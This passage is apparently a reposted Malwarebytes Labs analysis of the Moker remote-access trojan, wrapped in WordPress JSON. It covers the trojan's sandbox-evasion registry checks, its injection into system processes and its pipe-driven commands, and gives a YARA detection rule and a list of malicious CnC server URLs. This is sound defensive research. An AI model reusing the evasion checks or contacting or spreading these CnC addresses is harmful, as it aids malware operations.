searched:<\/p>\n<pre>\"HKEY_LOCAL_MACHINE\\HARDWARE\\ACPI\\DSDT\\VBOX__\"  \"HKEY_CURRENT_USER\\Software\\Trusteer\\Rapport\"  \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"  -&gt; SysAnalyzer  <\/pre>\n<p>If all the checks passed, the application reads it&#8217;s own file from the disk and searches there for some typical markers. An example of the search:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17644\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/search_markers.png\" alt=\"\" width=\"448\" height=\"227\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/search_markers.png 448w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/search_markers-300x152.png 300w\" sizes=\"auto, (max-width: 448px) 100vw, 448px\" \/><\/p>\n<p>The important thing is, those markers are present in the outermost layer &#8211; the original PE file (not the unpacked one). Thanks to this feature, knowing them allowed to create a very simple YARA rule to identify Moker:<\/p>\n<pre>rule MokerTrojan  {   strings:   $key = {3D FF 24 8B 92 C1 D6 9D}    condition:    IsPE and   all of them  }  <\/pre>\n<p>The mentioned markers are used as indicators, after which the encrypted CnC address is stored.<\/p>\n<p>Another feature, typical for Moker is mutex in the following format:<\/p>\n<pre>\"Global\\a0bp-&lt;Machine_ID&gt;\"<\/pre>\n<p>The mutex prevents the application from being run more than once.<\/p>\n<p>After the environment checks are passed, Moker unpacks the shellcode, that has capabilities of a downloader, and injects it (along with the initial PE file) into <em>svchost<\/em>.<\/p>\n<h4>Stage 2<\/h4>\n<p>If the main DLL was successfully downloaded by the <em>Stage 1<\/em>, it is being further injected in the applications. Example &#8211; Moker DLL injected into jusched (Java Update Scheduler):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17316\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected.png\" alt=\"\" width=\"639\" height=\"350\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected.png 639w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected-300x164.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jusched_infected-600x329.png 600w\" sizes=\"auto, (max-width: 639px) 100vw, 639px\" \/><\/p>\n<p>This module is responsible for all the malicious actions performed by the malware &#8211; also, it actively communicates with its CnC. Below you can see a sample POST request sent from inside the injected DLL:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17485\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sending_post.png\" alt=\"\" width=\"577\" height=\"280\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sending_post.png 577w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sending_post-300x146.png 300w\" sizes=\"auto, (max-width: 577px) 100vw, 577px\" \/><\/p>\n<p>If we try to dump the injected DLL, we can see, that it&#8217;s imported table has been destroyed &#8211; all the names of the DLLs and imported functions are erased. However, using <a href=\"https:\/\/github.com\/hasherezade\/pe_recovery_tools\/tree\/master\/imports_unerase\" target=\"_blank\">a dedicated tool<\/a> I was able to recover it (see more <a href=\"https:\/\/www.youtube.com\/watch?v=FRn121kK92E\" data-rel=\"lightbox-video-0\" target=\"_blank\">here<\/a>).<\/p>\n<p>The DLL provides various features typical for RAT (they didn&#8217;t chang from the latest analysis in 2015, provided <a href=\"https:\/\/breakingmalware.com\/malware\/moker-part-2-capabilities\/\" target=\"_blank\">here<\/a>).<\/p>\n<p>Code of the core DLL is written in a decent way, suggesting professionalism of the authors. However in contrary to the dropper, the obfuscation used here is rather simple. Most of the strings and API calls are not obfuscated, or obfuscated in a trivial way.<\/p>\n<p>Looking inside the code, we can see references to the registry keys, observed during behavioral analysis, i.e.:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17649\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6.png\" alt=\"\" width=\"757\" height=\"358\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6.png 757w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6-300x142.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/manage_key6-600x284.png 600w\" sizes=\"auto, (max-width: 757px) 100vw, 757px\" \/><\/p>\n<p>The DLL communicates not only with the CnC, but also with it&#8217;s other injected modules, using local sockets and named pipes. An example below &#8211; starting a local socket for listening:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17651\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/local_socket_listen.png\" alt=\"\" width=\"442\" height=\"528\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/local_socket_listen.png 442w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/local_socket_listen-251x300.png 251w\" sizes=\"auto, (max-width: 442px) 100vw, 442px\" \/><\/p>\n<p>The commands read from the ipe are parsed and executed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17652\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe.png\" alt=\"\" width=\"914\" height=\"184\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe.png 914w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe-300x60.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/read_pipe-600x121.png 600w\" sizes=\"auto, (max-width: 914px) 100vw, 914px\" \/><\/p>\n<p>Basing on the command id, malware can be requested over pipe to execute some command or to create and save a screenshot:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17650\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj.png\" alt=\"\" width=\"688\" height=\"404\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj.png 688w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj-300x176.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/commands_switcj-600x352.png 600w\" sizes=\"auto, (max-width: 688px) 100vw, 688px\" \/><\/p>\n<p>Among the interesting features of this part is, it also provides access to it&#8217;s features via simple GUI. It may be used for local tests, or. in case if the attackers prefer to access the victim machine via Remote Desktop.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17637\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons.png\" alt=\"\" width=\"970\" height=\"161\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons.png 970w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons-300x50.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons-600x100.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/buttons-965x161.png 965w\" sizes=\"auto, (max-width: 970px) 100vw, 970px\" \/><\/p>\n<h3>CnC servers<\/h3>\n<p>List of the found CnC servers (one address per one sample):<\/p>\n<pre>http:\/\/bitmixc.ml\/nnnn04722.php  http:\/\/bitmixc.ml\/msnwiwoq25.php  http:\/\/matthi.tk\/abb6a388.php  http:\/\/sally33.cf\/23mmmdw3.php  http:\/\/siri5.ml\/www9.php  <\/pre>\n<h3>Conclusion<\/h3>\n<p>Moker is a rare malware, but written by very skilled authors. Compilation timestamp of the core module is <em>2015-05-03 00:40:11<\/em>. This\u00a0suggests that since its moment of appearance, still the same samples are in circulation, only they are repacked by different packers. This fact, along with it&#8217;s RAT capabilities suggest, that it may be a tool produced and sold in 2015, possibly abandoned by the original developers.<\/p>\n<h3>Appendix<\/h3>\n<p><a href=\"http:\/\/blog.ensilo.com\/moker-a-new-apt-discovered-within-a-sensitive-network\" target=\"_blank\">http:\/\/blog.ensilo.com\/moker-a-new-apt-discovered-within-a-sensitive-network<\/a> &#8211; Ensilo on Moker (from 2015)<\/p>\n<p><a href=\"https:\/\/breakingmalware.com\/malware\/moker-part-1-dissecting-a-new-apt-under-the-microscope\/\" target=\"_blank\">https:\/\/breakingmalware.com\/malware\/moker-part-1-dissecting-a-new-apt-under-the-microscope\/<\/a> &#8211; part 1<\/p>\n<p><a href=\"https:\/\/breakingmalware.com\/malware\/moker-part-2-capabilities\/\" target=\"_blank\">https:\/\/breakingmalware.com\/malware\/moker-part-2-capabilities\/<\/a> &#8211;\u00a0 part 2<\/p>\n<p>&nbsp;<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/\">Elusive Moker Trojan is back<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Malwarebytes Labs| Date: Fri, 21 Apr 2017 18:44:58 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/' title='Elusive Moker Trojan is back'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/pexels-photo-132461.jpeg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>We finally have gotten our hands on a sample of Moker Trojan (that was discovered in 2015). This article will be a deep dive in its capabilities.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/ek\/\" rel=\"tag\">EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/exploit-kit\/\" rel=\"tag\">exploit kit<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malware\/\" rel=\"tag\">malware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/moker\/\" rel=\"tag\">Moker<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rat\/\" rel=\"tag\">rat<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/rig-ek\/\" rel=\"tag\">RIG EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/trojan\/\" rel=\"tag\">trojan<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/' title='Elusive Moker Trojan is back'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/04\/elusive-moker-trojan\/\">Elusive Moker Trojan is back<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10527,10534,3764,12055,1810,11792,10494,10833],"class_list":["post-7411","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-ek","tag-exploit-kit","tag-malware","tag-moker","tag-rat","tag-rig-ek","tag-threat-analysis","tag-trojan"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7411"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7411\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}